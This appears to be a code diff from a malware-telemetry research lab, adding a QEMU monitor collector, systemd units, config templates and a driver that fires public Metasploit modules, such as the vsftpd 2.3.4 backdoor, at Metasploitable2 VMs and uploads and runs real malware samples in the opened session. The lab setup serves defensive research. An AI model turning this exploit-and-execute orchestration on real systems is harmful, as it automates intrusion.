if cur_interval is not None and interval != cur_interval:
|
||||
_flush()
|
||||
agg = {}
|
||||
cur_interval = interval
|
||||
if value is not None:
|
||||
agg[event_name] = value
|
||||
# End of stream — flush the last partial row.
|
||||
_flush()
|
||||
finally:
|
||||
if proc.poll() is None:
|
||||
proc.terminate()
|
||||
try:
|
||||
proc.wait(timeout=3.0)
|
||||
except subprocess.TimeoutExpired:
|
||||
proc.kill()
|
||||
proc.wait(timeout=2.0)
|
||||
|
||||
return rows
|
||||
262
collectors/qmp.py
Normal file
262
collectors/qmp.py
Normal file
|
|
@ -0,0 +1,262 @@
|
|||
"""Source 2 (oracle): QEMU QMP sampler.
|
||||
|
||||
Connects to the QEMU monitor protocol socket exposed by the launcher
|
||||
($RUN_DIR/qmp.sock) and periodically queries the hypervisor for
|
||||
per-VM stats that don't show up in /proc/<qemu_pid>:
|
||||
|
||||
- per-disk block I/O (rd_bytes, wr_bytes, rd_ops, wr_ops)
|
||||
- VM run state (running / paused / shutdown)
|
||||
- per-netdev tx/rx counters (when available)
|
||||
- KVM stat counters (when available; introspection differs by qemu
|
||||
version, so anything we can't read is skipped silently)
|
||||
|
||||
This source is **oracle-only** — it does not exist on a deployed
|
||||
device. Every row carries ``available_in_deployment: false``.
|
||||
|
||||
Wire format: QMP is line-delimited JSON. The handshake is fixed:
|
||||
|
||||
server → {"QMP": {capabilities: [...], version: ...}}
|
||||
client → {"execute": "qmp_capabilities"}
|
||||
server → {"return": {}}
|
||||
(client may now issue commands)
|
||||
|
||||
We use a dedicated synchronous client because QMP is request/response
|
||||
and we don't need pipelining; one query batch per tick keeps the
|
||||
on-disk schema simple.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import logging
|
||||
import socket
|
||||
import threading
|
||||
import time
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.collectors.qmp")
|
||||
|
||||
SOURCE = "host_qmp"
|
||||
AVAILABLE_IN_DEPLOYMENT = False
|
||||
|
||||
|
||||
class QMPError(RuntimeError):
|
||||
pass
|
||||
|
||||
|
||||
@dataclass
|
||||
class _SockReader:
|
||||
sock: socket.socket
|
||||
buf: bytes = b""
|
||||
|
||||
def read_line(self, timeout_s: float = 5.0) -> str:
|
||||
deadline = time.monotonic() + timeout_s
|
||||
while b"\n" not in self.buf:
|
||||
self.sock.settimeout(max(0.1, deadline - time.monotonic()))
|
||||
try:
|
||||
chunk = self.sock.recv(8192)
|
||||
except socket.timeout as e:
|
||||
raise QMPError(f"QMP read timed out: {e}") from e
|
||||
if not chunk:
|
||||
raise QMPError("QMP connection closed by peer")
|
||||
self.buf += chunk
|
||||
line, _, rest = self.buf.partition(b"\n")
|
||||
self.buf = rest
|
||||
return line.decode("utf-8", errors="replace")
|
||||
|
||||
|
||||
class QMPClient:
|
||||
"""Tiny synchronous QMP client over a unix socket."""
|
||||
|
||||
def __init__(self, socket_path: str | Path) -> None:
|
||||
self.path = str(socket_path)
|
||||
self._sock: socket.socket | None = None
|
||||
self._reader: _SockReader | None = None
|
||||
|
||||
def connect(self, timeout_s: float = 5.0) -> dict[str, Any]:
|
||||
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
|
||||
s.settimeout(timeout_s)
|
||||
s.connect(self.path)
|
||||
self._sock = s
|
||||
self._reader = _SockReader(s)
|
||||
# Read greeting.
|
||||
greeting = json.loads(self._reader.read_line(timeout_s=timeout_s))
|
||||
if "QMP" not in greeting:
|
||||
raise QMPError(f"unexpected QMP greeting: {greeting!r}")
|
||||
# Negotiate capabilities (no flags requested).
|
||||
self.execute("qmp_capabilities")
|
||||
return greeting["QMP"]
|
||||
|
||||
def execute(self, command: str, **arguments: Any) -> Any:
|
||||
if self._sock is None or self._reader is None:
|
||||
raise QMPError("not connected")
|
||||
msg: dict[str, Any] = {"execute": command}
|
||||
if arguments:
|
||||
msg["arguments"] = arguments
|
||||
body = (json.dumps(msg) + "\n").encode("utf-8")
|
||||
self._sock.sendall(body)
|
||||
# QMP can interleave async events with the response — drain
|
||||
# until we see the matching {"return": ...} or {"error": ...}.
|
||||
for _ in range(64): # bounded to avoid an infinite loop on bugs
|
||||
line = self._reader.read_line()
|
||||
if not line.strip():
|
||||
continue
|
||||
resp = json.loads(line)
|
||||
if "return" in resp:
|
||||
return resp["return"]
|
||||
if "error" in resp:
|
||||
raise QMPError(f"{command}: {resp['error']}")
|
||||
# Otherwise it's an async event; ignore and keep reading.
|
||||
raise QMPError(f"{command}: too many async events without a response")
|
||||
|
||||
# ---- snapshot / revert (via human-monitor-command) -----------------
|
||||
|
||||
def savevm(self, name: str) -> str:
|
||||
"""``savevm <name>`` — capture a live VM snapshot inside the
|
||||
qcow2. Returns the monitor's reply (empty string on success).
|
||||
Requires the disk to be qcow2 (our launchers always are)."""
|
||||
return self._hmp(f"savevm {name}")
|
||||
|
||||
def loadvm(self, name: str) -> str:
|
||||
"""``loadvm <name>`` — restore the named snapshot. The guest
|
||||
is paused, restored, and resumed; collectors continue
|
||||
sampling and just see a sharp transition."""
|
||||
return self._hmp(f"loadvm {name}")
|
||||
|
||||
def _hmp(self, cmd: str) -> str:
|
||||
out = self.execute("human-monitor-command", **{"command-line": cmd})
|
||||
return out if isinstance(out, str) else ""
|
||||
|
||||
def close(self) -> None:
|
||||
if self._sock is not None:
|
||||
try:
|
||||
self._sock.close()
|
||||
except OSError:
|
||||
pass
|
||||
self._sock = None
|
||||
self._reader = None
|
||||
|
||||
|
||||
# ---- row builders ----------------------------------------------------------
|
||||
|
||||
|
||||
def _flatten_blockstats(blockstats: list[dict] | None) -> dict[str, dict[str, int]]:
|
||||
"""Compact ``query-blockstats`` to ``{device: {rd_ops, wr_ops, ...}}``."""
|
||||
out: dict[str, dict[str, int]] = {}
|
||||
for entry in blockstats or []:
|
||||
name = entry.get("device") or entry.get("qdev") or "unknown"
|
||||
s = entry.get("stats") or {}
|
||||
out[name] = {
|
||||
"rd_ops": int(s.get("rd_operations", 0)),
|
||||
"wr_ops": int(s.get("wr_operations", 0)),
|
||||
"rd_bytes": int(s.get("rd_bytes", 0)),
|
||||
"wr_bytes": int(s.get("wr_bytes", 0)),
|
||||
"flush_ops": int(s.get("flush_operations", 0)),
|
||||
}
|
||||
return out
|
||||
|
||||
|
||||
def collect_once(client: QMPClient, t_mono_origin_ns: int) -> dict[str, Any]:
|
||||
row: dict[str, Any] = {
|
||||
"t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
|
||||
"t_wall_ns": time.time_ns(),
|
||||
"source": SOURCE,
|
||||
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
|
||||
}
|
||||
|
||||
# query-status is dirt cheap and tells us whether the guest is
|
||||
# paused (rare) or running.
|
||||
try:
|
||||
status = client.execute("query-status")
|
||||
row["vm_status"] = status.get("status")
|
||||
row["vm_running"] = bool(status.get("running"))
|
||||
except QMPError as e:
|
||||
log.debug("query-status failed: %s", e)
|
||||
|
||||
try:
|
||||
bs = client.execute("query-blockstats")
|
||||
row["blockstats"] = _flatten_blockstats(bs)
|
||||
except QMPError as e:
|
||||
log.debug("query-blockstats failed: %s", e)
|
||||
|
||||
# query-stats is QEMU 7.1+ and the schema varies across versions.
|
||||
# We only ask for KVM stats and tolerate any subset of fields.
|
||||
try:
|
||||
stats = client.execute("query-stats", target="vm")
|
||||
row["kvm_stats"] = _summarize_query_stats(stats)
|
||||
except QMPError as e:
|
||||
log.debug("query-stats not supported: %s", e)
|
||||
|
||||
return row
|
||||
|
||||
|
||||
def _summarize_query_stats(stats_resp: list[dict] | dict) -> dict[str, int]:
|
||||
"""Reduce ``query-stats`` to a flat name→value map of integer
|
||||
counters. The full payload is verbose and version-specific; we only
|
||||
ever want individual scalar counters downstream."""
|
||||
flat: dict[str, int] = {}
|
||||
items = stats_resp if isinstance(stats_resp, list) else [stats_resp]
|
||||
for entry in items:
|
||||
for s in entry.get("stats", []) or []:
|
||||
name = s.get("name")
|
||||
value = s.get("value")
|
||||
if isinstance(name, str) and isinstance(value, int):
|
||||
flat[name] = value
|
||||
return flat
|
||||
|
||||
|
||||
# ---- run loop --------------------------------------------------------------
|
||||
|
||||
|
||||
def run_loop(
|
||||
socket_path: str | Path,
|
||||
output_path: Path,
|
||||
t_mono_origin_ns: int,
|
||||
interval_ms: int,
|
||||
stop_event: threading.Event,
|
||||
) -> int:
|
||||
"""Connect to ``socket_path`` and sample at ``interval_ms`` until
|
||||
``stop_event``. Returns the number of rows written.
|
||||
|
||||
A single missed sample (transient QMP error) is logged and skipped;
|
||||
repeated failures terminate the loop so the episode finishes cleanly
|
||||
rather than hanging on a dead hypervisor."""
|
||||
interval_ns = interval_ms * 1_000_000
|
||||
client = QMPClient(socket_path)
|
||||
try:
|
||||
client.connect(timeout_s=5.0)
|
||||
except (OSError, QMPError) as e:
|
||||
log.warning("QMP connect to %s failed: %s — collector exits cleanly", socket_path, e)
|
||||
return 0
|
||||
|
||||
rows = 0
|
||||
consecutive_failures = 0
|
||||
next_tick = time.monotonic_ns()
|
||||
output_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
try:
|
||||
with output_path.open("a", buffering=1) as f:
|
||||
while not stop_event.is_set():
|
||||
try:
|
||||
row = collect_once(client, t_mono_origin_ns)
|
||||
f.write(json.dumps(row) + "\n")
|
||||
rows += 1
|
||||
consecutive_failures = 0
|
||||
except (QMPError, OSError) as e:
|
||||
consecutive_failures += 1
|
||||
log.warning("QMP sample %d failed: %s", rows, e)
|
||||
if consecutive_failures >= 5:
|
||||
log.warning("5 consecutive QMP failures; bailing")
|
||||
break
|
||||
|
||||
next_tick += interval_ns
|
||||
sleep_ns = next_tick - time.monotonic_ns()
|
||||
if sleep_ns > 0:
|
||||
stop_event.wait(sleep_ns / 1_000_000_000)
|
||||
else:
|
||||
next_tick = time.monotonic_ns()
|
||||
finally:
|
||||
client.close()
|
||||
return rows
|
||||
|
|
@ -171,6 +171,10 @@ thing plays in our pipeline.
|
|||
- **pycdlib** — pure-Python ISO9660/Joliet/Rock Ridge builder. Used to
|
||||
produce the NoCloud cidata ISO without depending on system mkisofs/
|
||||
xorriso. https://clalancette.github.io/pycdlib/
|
||||
- **msgpack** — binary serialization used by Metasploit's RPC API. The
|
||||
Tier-3 driver speaks msfrpcd's native msgpack-over-HTTPS so we don't
|
||||
pull in a higher-level Metasploit Python client.
|
||||
https://msgpack.org
|
||||
|
||||
---
|
||||
|
||||
|
|
|
|||
11
etc/caddy-root.crt
Normal file
11
etc/caddy-root.crt
Normal file
|
|
@ -0,0 +1,11 @@
|
|||
-----BEGIN CERTIFICATE-----
|
||||
MIIBpDCCAUqgAwIBAgIRAP15YNZS/guq4ES7RfuBBQQwCgYIKoZIzj0EAwIwMDEu
|
||||
MCwGA1UEAxMlQ2FkZHkgTG9jYWwgQXV0aG9yaXR5IC0gMjAyNiBFQ0MgUm9vdDAe
|
||||
Fw0yNjA0MjYxMzE5NTZaFw0zNjAzMDQxMzE5NTZaMDAxLjAsBgNVBAMTJUNhZGR5
|
||||
IExvY2FsIEF1dGhvcml0eSAtIDIwMjYgRUNDIFJvb3QwWTATBgcqhkjOPQIBBggq
|
||||
hkjOPQMBBwNCAASjU+sJ+rLPPtTK5t7MsKa6/WDknumPOgxy7uGwGATkd65cHTjz
|
||||
zTH6+0+uJ7LPZFTJoPSB5WVHrEA0veY8AxH5o0UwQzAOBgNVHQ8BAf8EBAMCAQYw
|
||||
EgYDVR0TAQH/BAgwBgEB/wIBATAdBgNVHQ4EFgQU8EarYtjVc2EvpYE6OPhDQlYB
|
||||
docwCgYIKoZIzj0EAwIDSAAwRQIhANxALV9oKSAC4JEB/w1EctnzMfzLyueBpGoB
|
||||
7p5I07LRAiAKQuhNMeTDSK3Qql+IjunH8UPidETNXfyInwMnbzgAaQ==
|
||||
-----END CERTIFICATE-----
|
||||
44
etc/cis490-bootstrap.service
Normal file
44
etc/cis490-bootstrap.service
Normal file
|
|
@ -0,0 +1,44 @@
|
|||
[Unit]
|
||||
Description=CIS490 mTLS bootstrap endpoint (auto-issue client certs to enrolled lab hosts)
|
||||
Documentation=https://maxgit.wg/spectral/CIS490
|
||||
After=network-online.target
|
||||
Wants=network-online.target
|
||||
|
||||
[Service]
|
||||
Type=simple
|
||||
# Runs as root because the wg-pki CA private key is root-only. The
|
||||
# service shells out to issue-cis490-client-cert.sh per mint and
|
||||
# never touches anything else under /var/lib.
|
||||
User=root
|
||||
Group=root
|
||||
WorkingDirectory=/opt/cis490
|
||||
ExecStart=/opt/cis490/.venv/bin/python -m bootstrap \
|
||||
--listen-host 127.0.0.1 \
|
||||
--listen-port 8446 \
|
||||
--issuer-script /opt/wg-pki/scripts/issue-cis490-client-cert-wrapper.sh \
|
||||
--issued-root /var/lib/wg-pki/issued
|
||||
Restart=on-failure
|
||||
RestartSec=5
|
||||
|
||||
# Hardening — narrower than receiver because this binary's only job
|
||||
# is to call openssl + tar via the issuer script, then serve files.
|
||||
NoNewPrivileges=true
|
||||
PrivateTmp=true
|
||||
ProtectSystem=strict
|
||||
# /home/max/.env/wg-pki/scripts/ holds the issuer script the wrapper
|
||||
# exec's. ProtectHome={read-only,tmpfs} both *hide* /home contents
|
||||
# instead of restricting them to read-only — so we leave /home
|
||||
# accessible. ProtectSystem=strict still keeps everything outside
|
||||
# /var/lib/wg-pki write-protected.
|
||||
ProtectHome=no
|
||||
ReadWritePaths=/var/lib/wg-pki
|
||||
ProtectKernelTunables=true
|
||||
ProtectKernelModules=true
|
||||
ProtectControlGroups=true
|
||||
LockPersonality=true
|
||||
RestrictNamespaces=true
|
||||
RestrictRealtime=true
|
||||
SystemCallArchitectures=native
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
|
@ -1,33 +1,46 @@
|
|||
[Unit]
|
||||
Description=CIS490 episode campaign runner
|
||||
Description=CIS490 lab-host episode orchestrator (fleet mode)
|
||||
Documentation=https://maxgit.wg/spectral/CIS490
|
||||
After=network-online.target
|
||||
# Episodes need KVM. msfrpcd (for Tier 3+) is brought up out-of-band
|
||||
# by cis490-msfrpcd.service when installed.
|
||||
After=network-online.target wg-quick@wg0.service
|
||||
Wants=network-online.target
|
||||
|
||||
[Service]
|
||||
Type=simple
|
||||
User=cis490
|
||||
Group=cis490
|
||||
SupplementaryGroups=kvm
|
||||
WorkingDirectory=/opt/cis490
|
||||
ExecStart=/opt/cis490/.venv/bin/python tools/run_campaign.py \
|
||||
# /etc/cis490/lab-host.env is written by scripts/install-lab-host.sh;
|
||||
# carries FLEET_HOST_ID, BRIDGE, and any operator-supplied overrides.
|
||||
EnvironmentFile=/etc/cis490/lab-host.env
|
||||
# Fleet mode: detect host capacity, run that many concurrent episodes
|
||||
# per wave with samples drawn from the manifest. Each invocation runs
|
||||
# one wave and exits; systemd respawns per Restart= below, giving us
|
||||
# a continuous stream of fresh-sample episodes per host. The shipper
|
||||
# picks them up as `done.marker` files appear.
|
||||
ExecStart=/opt/cis490/.venv/bin/python /opt/cis490/tools/run_fleet.py \
|
||||
--data-root /var/lib/cis490/data \
|
||||
--target 100
|
||||
Restart=on-failure
|
||||
RestartSec=10
|
||||
--manifest /opt/cis490/samples/manifest.toml \
|
||||
--waves 1
|
||||
Restart=always
|
||||
RestartSec=15
|
||||
|
||||
# Hardening
|
||||
NoNewPrivileges=true
|
||||
PrivateTmp=false
|
||||
# Hardening — explicitly grant CAP_NET_RAW for tcpdump (source 4) and
|
||||
# CAP_SYS_ADMIN / CAP_PERFMON for perf (source 3) when the operator
|
||||
# enables those. Both are inherited by per-episode subprocesses.
|
||||
# NoNewPrivileges=false is required because AmbientCapabilities only
|
||||
# survives across exec() if NNP is off.
|
||||
NoNewPrivileges=false
|
||||
PrivateTmp=true
|
||||
ProtectSystem=strict
|
||||
ProtectHome=true
|
||||
ReadWritePaths=/var/lib/cis490 /tmp/cis490-vm /dev/kvm
|
||||
ProtectKernelTunables=true
|
||||
ProtectKernelModules=true
|
||||
ProtectControlGroups=true
|
||||
LockPersonality=true
|
||||
RestrictRealtime=true
|
||||
SystemCallArchitectures=native
|
||||
# /tmp is needed for per-slot RUN_DIR (cis490-vm-fleet-<slot>) — the
|
||||
# fleet runner stages QEMU's sockets + pidfile there.
|
||||
ReadWritePaths=/var/lib/cis490 /tmp
|
||||
SupplementaryGroups=kvm
|
||||
AmbientCapabilities=CAP_NET_RAW CAP_NET_ADMIN CAP_SYS_ADMIN CAP_PERFMON
|
||||
CapabilityBoundingSet=CAP_NET_RAW CAP_NET_ADMIN CAP_SYS_ADMIN CAP_PERFMON CAP_DAC_READ_SEARCH
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
|
|
|||
|
|
@ -1,23 +1,19 @@
|
|||
[Unit]
|
||||
Description=CIS490 episode shipper
|
||||
Description=CIS490 lab-host episode shipper
|
||||
Documentation=https://maxgit.wg/spectral/CIS490
|
||||
After=network-online.target cis490-orchestrator.service
|
||||
# WG must be up before the shipper can reach the receiver.
|
||||
After=network-online.target wg-quick@wg0.service
|
||||
Wants=network-online.target
|
||||
Requires=wg-quick@wg0.service
|
||||
|
||||
[Service]
|
||||
Type=simple
|
||||
User=cis490
|
||||
Group=cis490
|
||||
WorkingDirectory=/opt/cis490
|
||||
ExecStart=/opt/cis490/.venv/bin/python tools/shipper.py \
|
||||
--data-root /var/lib/cis490/data \
|
||||
--receiver-url https://collector.wg \
|
||||
--host-id lab-host-1 \
|
||||
--ca-bundle /etc/cis490/certs/wg-ca.pem \
|
||||
--client-cert /etc/cis490/certs/lab-host-1.pem \
|
||||
--client-key /etc/cis490/certs/lab-host-1.key
|
||||
ExecStart=/opt/cis490/.venv/bin/python -m shipper --config /etc/cis490/lab-host.toml
|
||||
Restart=on-failure
|
||||
RestartSec=10
|
||||
RestartSec=5
|
||||
|
||||
# Hardening
|
||||
NoNewPrivileges=true
|
||||
|
|
@ -29,6 +25,7 @@ ProtectKernelTunables=true
|
|||
ProtectKernelModules=true
|
||||
ProtectControlGroups=true
|
||||
LockPersonality=true
|
||||
RestrictNamespaces=true
|
||||
RestrictRealtime=true
|
||||
SystemCallArchitectures=native
|
||||
|
||||
|
|
|
|||
50
etc/lab-host.toml.example
Normal file
50
etc/lab-host.toml.example
Normal file
|
|
@ -0,0 +1,50 @@
|
|||
# CIS490 lab-host — copy to /etc/cis490/lab-host.toml and edit.
|
||||
#
|
||||
# This config drives BOTH the orchestrator (which runs episodes) and
|
||||
# the shipper (which uploads completed episodes to the central
|
||||
# receiver over WG).
|
||||
|
||||
# Stable identity for this lab host. Used in the receiver path
|
||||
# (/v1/episodes/<host_id>/...) and in the X-Lab-Host header. Pick
|
||||
# something short, stable, and DNS-safe — letters, digits, _.- only.
|
||||
host_id = "REPLACE_ME"
|
||||
|
||||
[paths]
|
||||
data_root = "/var/lib/cis490/data"
|
||||
samples_store = "/var/lib/cis490/samples/store"
|
||||
qcow_image = "/var/lib/cis490/vm/images/metasploitable2.qcow2"
|
||||
|
||||
[receiver]
|
||||
# The receiver lives behind Caddy on the WG-side collector host. The
|
||||
# hostname must resolve over WG (collector.wg in the canonical
|
||||
# spectral lab). The wg-pki CA must be on every lab-host so the
|
||||
# Caddy-issued internal cert validates.
|
||||
url = "https://collector.wg"
|
||||
ca_bundle = "/etc/cis490/certs/wg-ca.pem"
|
||||
|
||||
# mTLS: leaf cert + private key issued by wg-pki for THIS host_id.
|
||||
# Comment these out to fall back to bearer-token auth during early
|
||||
# bring-up.
|
||||
client_cert = "/etc/cis490/certs/lab-host.pem"
|
||||
client_key = "/etc/cis490/certs/lab-host.key"
|
||||
|
||||
# Bearer is optional and only used if mTLS isn't yet configured. When
|
||||
# both are set, mTLS does the actual authn and the bearer is a
|
||||
# belt-and-suspenders check.
|
||||
# bearer_token = "REPLACE_ME_WITH_SECRET"
|
||||
|
||||
# Set to false ONLY for local-loopback dev against an unsigned cert.
|
||||
# verify_tls = true
|
||||
|
||||
[shipper]
|
||||
scan_interval_s = 5.0
|
||||
request_timeout_s = 60.0
|
||||
|
||||
[episode]
|
||||
baseline_seconds = 30
|
||||
infected_seconds = 90
|
||||
dormant_seconds = 60
|
||||
|
||||
[retention]
|
||||
keep_local_for_days = 7
|
||||
prune_at_disk_pct = 80
|
||||
|
|
@ -1,6 +1,6 @@
|
|||
# CIS490 receiver — copy to /etc/cis490/receiver.toml and edit.
|
||||
|
||||
listen_addr = "127.0.0.1:8443"
|
||||
listen_addr = "127.0.0.1:8444"
|
||||
store_root = "/var/lib/cis490/episodes"
|
||||
incoming_root = "/var/lib/cis490/incoming"
|
||||
index_path = "/var/lib/cis490/index.jsonl"
|
||||
|
|
|
|||
|
|
@ -1,12 +1,92 @@
|
|||
# exploits/
|
||||
|
||||
Metasploit resource scripts (`*.rc`) that drive specific exploit modules
|
||||
deterministically — same inputs, same module options, every time.
|
||||
The Tier-3 exploit driver — fires a Metasploit module against a
|
||||
vulnerable target VM, watches for the resulting session, and stamps the
|
||||
session-open transition into the episode's `events.jsonl` so the
|
||||
labeler can mark `armed → infecting` honestly.
|
||||
|
||||
Each script:
|
||||
- Sets `RHOSTS` to the guest's bridge IP.
|
||||
- Sets a payload that opens a session usable for sample upload + execute.
|
||||
- Avoids any options that introduce randomness in the exploit fire timing
|
||||
(so that the `armed → infecting` transition lands at a predictable offset).
|
||||
## Layout
|
||||
|
||||
These scripts pair with public Metasploit modules. We do not author exploits.
|
||||
```
|
||||
exploits/
|
||||
msfrpc.py tiny msgpack-over-HTTPS client for msfrpcd
|
||||
driver.py MSFExploitDriver — plugged in as EpisodeRunner.on_phase
|
||||
modules.py ModuleConfig + TOML loader
|
||||
modules/
|
||||
vsftpd_234_backdoor.toml first canned module (Metasploitable2)
|
||||
...
|
||||
```
|
||||
|
||||
## Module configs
|
||||
|
||||
Each `modules/*.toml` describes one Metasploit module — its path, the
|
||||
options to set, and the payload to use. The driver reads these files
|
||||
to drive `module.execute` over msfrpc.
|
||||
|
||||
```toml
|
||||
description = "..."
|
||||
[module]
|
||||
type = "exploit" # exploit | auxiliary | post
|
||||
path = "unix/ftp/vsftpd_234_backdoor"
|
||||
|
||||
[module.options]
|
||||
RHOSTS = "{{ target_ip }}" # placeholder substituted at runtime
|
||||
RPORT = 21
|
||||
|
||||
[payload]
|
||||
path = "cmd/unix/interact"
|
||||
[payload.options] # optional
|
||||
# LHOST = "{{ target_ip }}"
|
||||
|
||||
[session]
|
||||
type = "shell"
|
||||
```
|
||||
|
||||
The only placeholder supported today is `{{ target_ip }}`. Add more in
|
||||
`exploits/modules.py::ModuleConfig.render_options` when needed.
|
||||
|
||||
## Running
|
||||
|
||||
```sh
|
||||
# 1. Start msfrpcd locally:
|
||||
msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
|
||||
|
||||
# 2. Drop a vulnerable target image at vm/images/<name>.qcow2 (e.g.
|
||||
# Metasploitable2 — see docs/sources.md for sha256).
|
||||
|
||||
# 3. Drive an episode:
|
||||
MSFRPC_PASSWORD=<password> uv run python tools/run_tier3_demo.py \
|
||||
--module vsftpd_234_backdoor \
|
||||
--target-port 21 \
|
||||
--data-root data
|
||||
```
|
||||
|
||||
The episode's `events.jsonl` will contain:
|
||||
|
||||
```
|
||||
driver_setup — module + target snapshotted before fire
|
||||
exploit_fire — module.execute issued
|
||||
session_open — new session id observed in session.list
|
||||
session_landing_probe — first command response (id) recorded
|
||||
sample_executed — workload kicked off inside the session
|
||||
session_dormant — workload killed
|
||||
session_killed — session.stop at episode end
|
||||
```
|
||||
|
||||
These pair with the standard phase labels in `labels.jsonl` so a
|
||||
downstream loader can reconcile "what the orchestrator scheduled"
|
||||
against "what actually happened on the wire".
|
||||
|
||||
## Adding a module
|
||||
|
||||
1. Drop a TOML at `exploits/modules/<name>.toml` per the schema above.
|
||||
2. Pick a payload that works without a callback channel until the
|
||||
`br-malware` bridge is in (see `vm/launch_target.sh` — SLIRP +
|
||||
`restrict=on` blocks reverse-tcp by design). `cmd/unix/interact`
|
||||
and other "session on the same socket" payloads are safe.
|
||||
3. Drive a quick check: `uv run python tools/run_tier3_demo.py --module <name>`.
|
||||
4. The new module is automatically picked up by `tools/run_tier3_demo.py`
|
||||
via `--module <name>`; no driver code changes needed.
|
||||
|
||||
We do **not** author exploits or modify upstream Metasploit code. The
|
||||
driver is a pure adapter from the project's phase machine to msfrpc.
|
||||
|
|
|
|||
0
exploits/__init__.py
Normal file
0
exploits/__init__.py
Normal file
338
exploits/driver.py
Normal file
338
exploits/driver.py
Normal file
|
|
@ -0,0 +1,338 @@
|
|||
"""Tier-3 exploit driver.
|
||||
|
||||
Plugged into ``EpisodeRunner`` as the ``on_phase`` callback. Translates
|
||||
the closed phase enum into msfrpc actions:
|
||||
|
||||
clean — idle. (no-op; exploit hasn't fired yet)
|
||||
armed — module loaded + options applied; module fires
|
||||
with ``module.execute``. Driver records the fire
|
||||
timestamp via ``emit_event`` so the labeler can
|
||||
align ``armed`` with what's actually happening.
|
||||
infecting — poll for a new session; on session_open, run a
|
||||
one-shot landing command (``id`` or similar) so
|
||||
we have a clear "session is responsive" event.
|
||||
infected_running — start observable workload inside the session.
|
||||
dormant — kill the workload, leave the session alive.
|
||||
reverting — kill session, snapshot revert handled by caller.
|
||||
|
||||
The events the driver writes match the schema in ``docs/data-model.md``:
|
||||
``exploit_fire``, ``session_open``, ``sample_executed``, ``session_dormant``,
|
||||
``session_killed``.
|
||||
|
||||
The driver does NOT author exploits or pick payloads at runtime — those
|
||||
choices live in ``exploits/modules/*.toml``. The driver is a pure
|
||||
adapter between the phase machine and msfrpc.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import time
|
||||
from dataclasses import dataclass
|
||||
from typing import Callable
|
||||
|
||||
from pathlib import Path
|
||||
|
||||
from samples.manifest import Sample
|
||||
|
||||
from .modules import ModuleConfig
|
||||
from .msfrpc import MSFRpcClient, wait_for_new_session
|
||||
from .workloads import (
|
||||
ChunkedUpload, Workload, chunked_real_binary_upload,
|
||||
real_binary_workload, workload_for,
|
||||
)
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.exploits.driver")
|
||||
|
||||
EmitEvent = Callable[..., None]
|
||||
|
||||
|
||||
@dataclass
|
||||
class DriverConfig:
|
||||
target_ip: str
|
||||
session_open_timeout_s: float = 30.0
|
||||
# Driver v1 fallback workload — used only when no Sample is passed
|
||||
# in (Sample-driven runs override these via exploits.workloads).
|
||||
# We keep the v1 path so existing callers keep working unchanged.
|
||||
workload_cmd: str = "yes > /dev/null"
|
||||
workload_kill_cmd: str = "pkill yes; true"
|
||||
# Where staged real-malware binaries live on the lab host.
|
||||
sample_store_root: Path | None = None
|
||||
|
||||
|
||||
class MSFExploitDriver:
|
||||
"""Phase-to-msfrpc adapter. One instance per episode.
|
||||
|
||||
When constructed with a ``Sample``, the driver dispatches the
|
||||
``infected_running`` / ``dormant`` workload through
|
||||
``exploits.workloads`` so the in-session behaviour matches the
|
||||
sample's profile (cpu-saturate, scan-and-dial, io-walk, bursty-c2,
|
||||
low-and-slow, shell-resident). Without a sample, falls back to
|
||||
the v1 single-command workload — useful for the very first
|
||||
Tier-3 smoke runs."""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
client: MSFRpcClient,
|
||||
module: ModuleConfig,
|
||||
cfg: DriverConfig,
|
||||
emit_event: EmitEvent,
|
||||
*,
|
||||
sample: Sample | None = None,
|
||||
) -> None:
|
||||
self.client = client
|
||||
self.module = module
|
||||
self.cfg = cfg
|
||||
self.emit = emit_event
|
||||
self.sample = sample
|
||||
# Chunked upload plan (None unless real binary path applies).
|
||||
self._chunked: ChunkedUpload | None = None
|
||||
self.workload: Workload | None = self._resolve_workload(sample)
|
||||
|
||||
self._sessions_seen_at_arm: set[int] = set()
|
||||
self._session_id: int | None = None
|
||||
self._job_id: int | str | None = None
|
||||
self._fired = False
|
||||
|
||||
def _resolve_workload(self, sample: Sample | None) -> Workload | None:
|
||||
"""Pick the best workload for this sample:
|
||||
1. real binary (if staged at samples/store/<sha256>) → chunked
|
||||
upload + exec via dedicated dispatch path
|
||||
2. profile mimic from exploits.workloads
|
||||
3. None → driver v1 fallback (yes-loop)
|
||||
"""
|
||||
if sample is None:
|
||||
return None
|
||||
if sample.kind == "real" and self.cfg.sample_store_root is not None:
|
||||
bin_path = sample.binary_path(self.cfg.sample_store_root)
|
||||
if bin_path is not None:
|
||||
try:
|
||||
payload = bin_path.read_bytes()
|
||||
self._chunked = chunked_real_binary_upload(payload, sample=sample)
|
||||
# Return a Workload shell so the rest of the driver
|
||||
# can treat the dispatch uniformly. start_cmd is
|
||||
# never sent verbatim — _start_workload walks the
|
||||
# chunked plan instead.
|
||||
return Workload(
|
||||
profile=self._chunked.profile,
|
||||
start_cmd="(chunked-upload-managed-by-driver)",
|
||||
stop_cmd=self._chunked.stop_cmd,
|
||||
description=f"Real binary chunked upload+execute "
|
||||
f"({len(payload)} bytes, "
|
||||
f"{self._chunked.n_chunks} chunks)",
|
||||
)
|
||||
except OSError as e:
|
||||
log.warning("could not read real sample %s: %s; falling back", bin_path, e)
|
||||
return workload_for(sample)
|
||||
|
||||
# ---- lifecycle ------------------------------------------------------
|
||||
|
||||
def setup(self) -> None:
|
||||
"""Authenticate and snapshot the pre-existing session set so we
|
||||
can recognize a *new* session as the one we just opened."""
|
||||
self.client.login()
|
||||
self._sessions_seen_at_arm = set(self.client.session_list().keys())
|
||||
self.emit(
|
||||
"driver_setup",
|
||||
module=self.module.module_path,
|
||||
payload=self.module.payload_path,
|
||||
target_ip=self.cfg.target_ip,
|
||||
